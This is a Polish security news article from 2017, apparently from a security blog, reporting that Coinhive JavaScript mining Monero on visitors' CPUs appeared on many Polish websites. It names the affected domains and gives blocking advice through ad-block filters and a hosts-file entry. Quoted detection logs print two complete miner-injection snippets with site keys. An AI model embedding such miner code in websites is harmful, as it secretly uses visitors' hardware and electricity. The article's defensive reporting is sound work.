Uważajcie, bo znane strony WWW kopią kryptowaluty na Waszych komputerach

Od paru dni napływają do nas zgłoszenia dotyczące nieznanych wcześniej incydentów. W mniej lub bardziej popularnych serwisach WWW pojawiają się pliki JavaScript, które obciążają procesory odwiedzających stronę kopiąc walutę Monero.

Różne metody działania przestępców i cwaniaków widzieliśmy, jednak kopanie kryptowalut na procesorach osób odwiedzających określone witryny WWW to dla nas nowość i jesteśmy pod wrażeniem kreatywności autorów tego pomysłu. Niestety strony, rozgrzewające Wasze procesory, znajdują się także w Polsce i należą do nich najpopularniejsze witryny w kraju.

Na czym polega atak

Produkowanie kryptowalut wymaga sporej mocy obliczeniowej. To kosztuje – zużywają się procesory i karty graficzne, kosztuje prąd, sprzęt się grzeje. Aby ten proces był efektywny kosztowo, musi odbywać się na dużą skalę (jak np. w wielkich fabrykach bitcoinów w Chinach) lub cudzym kosztem (jak np. botnety kopiące kryptowaluty na przejętych komputerach lub urządzeniach IoT). Ten drugi wariant zyskał niedawno dużą popularność w nowej formie. Okazało się bowiem, że jedną z popularnych kryptowalut – monero – można kopać za pomocą JavaScriptu w przeglądarce.

Gdy odwiedzacie strony WWW, Wasza przeglądarka może domyślnie wczytywać i uruchamiać znajdujące się tam skrypty. Skrypty te, pobrane z serwera, wykonywane są na Waszym komputerze. Oznacza to, ze jeżeli traficie na stronę, która chce kopać kryptowaluty, to właśnie Wasz komputer będzie się grzał i pobierał więcej prądu, by wykonywać pracę za kogoś. W dostarczaniu takich skryptów specjalizuje się firma Coinhive (konkurentem jest np. JSECoin). Jak sama wspomina na swojej stronie, jeśli w Waszym serwisie non stop kopie 10-20 osób, to możecie się z tego tytułu spodziewać przychodu w okolicach 30 dolarów miesięcznie. 70% trafia do Was, 30% do organizatorów procederu. Czysty zysk – jeśli uda się Wam uruchomić ten skrypt na cudzej stronie.

Gdzie można trafić na te skrypty

Jeden z naszych Czytelników (dzięki Paweł!) podzielił się z nami logami swojego systemu wykrywania zagrożeń, wskazującymi na obecność skryptów coin-hive w polskich serwisach WWW. Logi wyglądały tak:

http://zoomia.pl/index.html <script src="https://coin-hive.com/lib/coinhive.min.js"></script> <script type="text/javascript"> var miner = new CoinHive.Anonymous('9if7L1lYE7EhUHyxrpCQwKoBaBigDEqD'); miner.start(); </script> http://ciasteczkowapolityka.pl/ <script src="https://coin-hive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous('fiO1mpwOSfmc2UPG8LTLz0JYKnGzqsMw','threads: 1'); miner.start(CoinHive.FORCE_EXCLUSIVE_TAB); </script>

W tych przypadkach udało się potwierdzić obecność kodu na tych witrynach. Logi pokazały także obecność skryptu na innych witrynach, w tym należących do grupy Gazeta.pl

2017/09/18 19:48:29 myfitness.pl https 2017/09/19 15:46:49 myfitness.pl https 2017/09/19 09:26:14 ladnydom.pl http 2017/09/19 15:12:04 ladnydom.pl http 2017/09/19 08:36:21 gazeta.pl https

Nie udało się na czas potwierdzić obecności kodu (sprawdziliśmy kilka dni później, kiedy mógł już być usunięty), ale komputery z reguły nie kłamią. Prawdopodobnie kod mógł znaleźć się tam za pośrednictwem np. zewnętrznych reklam. Inny internauta poinformował dzisiaj na Twitterze, że złośliwy kod był także na popularnym portalu Weszlo.com:

Czy to tylko u mnie? Po wejściu na https://t.co/4OpuZ1FASx i poszczególne podstrony mój A-V blokuje koparkę. ?@WeszloCom Sprawdźcie proszę. pic.twitter.com/0XES9AZQdT — Marcin Mnich (@Stona2) September 28, 2017

Nie tylko w Polsce

Podobne incydenty miały miejsce ostatnio na wielu popularnych portalach, np. ThePirateBay (podobno uruchomione celowo) czy telewizji Showtime (brak informacji w jaki sposób trafił tam złośliwy kod). Złośliwy kod umieszczany jest także na licznych zhakowanych stronach oraz dystrybuowany przez złośliwe reklamy wstrzykiwane do zazwyczaj niegroźnych sieci reklamowych. Bywa także wstrzykiwany przez bramki Tor2web:

Various tor2web proxies also inject the coinhive miner (and ads). For example: onion[.]rip proxying the @torproject hidden-service below. pic.twitter.com/3zptqI0nWK — Yᴏɴᴀᴛʜᴀɴ Kʟɪᴊɴsᴍᴀ (@ydklijnsma) September 26, 2017

i znaleźć go dzisiaj można w setkach popularnych witryn internetowych:

I started scanning the top 1M Alexa for coin-hive integration.

5 mins scanning and already 100+ hits. pic.twitter.com/WPk5cTrFlu — Paul Sec.jpeg .exe (@PaulWebSec) September 27, 2017

Wygląda zatem na to, że będziemy na niego trafiać coraz częściej. Na szczęście wykrywa go już część programów antywirusowych i jest blokowany przez popularne wtyczki do przeglądarek. Jeśli chcecie się upewnić, że Wasz komputer nie będzie kopał cudzych kryptowalut, dodajcie do filtrów wtyczek typu AdBlock:

https://coin-hive.com/lib/coinhive.min.js

Możecie też dodać odpowiedni wpis do pliku hosts:

0.0.0.0 coin-hive.com

Wystarczy także włączyć dodatek typu NoScript lub wyłączyć uruchamianie JS w ustawieniach przeglądarki.

Aktualizacja 18:50

Od jednego z Czytelników otrzymaliśmy listę stron, które w ostatnich dniach odwoływały się do skryptów z domeny coin-hive.com. Wygląda równie ciekawie co wcześniejsze doniesienia:

123movies.co agromet.prv.pl beszamel.se.pl bpsc.com.pl codingforums.com dzienniklodzki.pl dziennikpolski24.pl echodnia.eu express.olsztyn.pl expressilustrowany.pl faucethub.io gazetakrakowska.pl gazetalubuska.pl gazetawroclawska.pl gloswielkopolski.pl igpw.pl iq-tester.pl katowice.naszemiasto.pl konkol.pl kurierlubelski.pl lodz.naszemiasto.pl m.se.pl motofakty.pl muratordom.pl nowiny24.pl nto.pl parkiet.com patrz.pl podroze.se.pl poradnikzdrowie.pl rp.pl se.pl superbiz.se.pl szczecin.naszemiasto.pl telemagazyn.pl thepiratebay.org tomasz.topa.pl twojastancja.pl urodaizdrowie.pl vegas-panel.panelradiowy.pl warszawa.naszemiasto.pl weszlo.com

Obecność na tej liście poważanych tytułów prawdopodobnie świadczy o rozsiewaniu skryptów przez systemy reklamowe.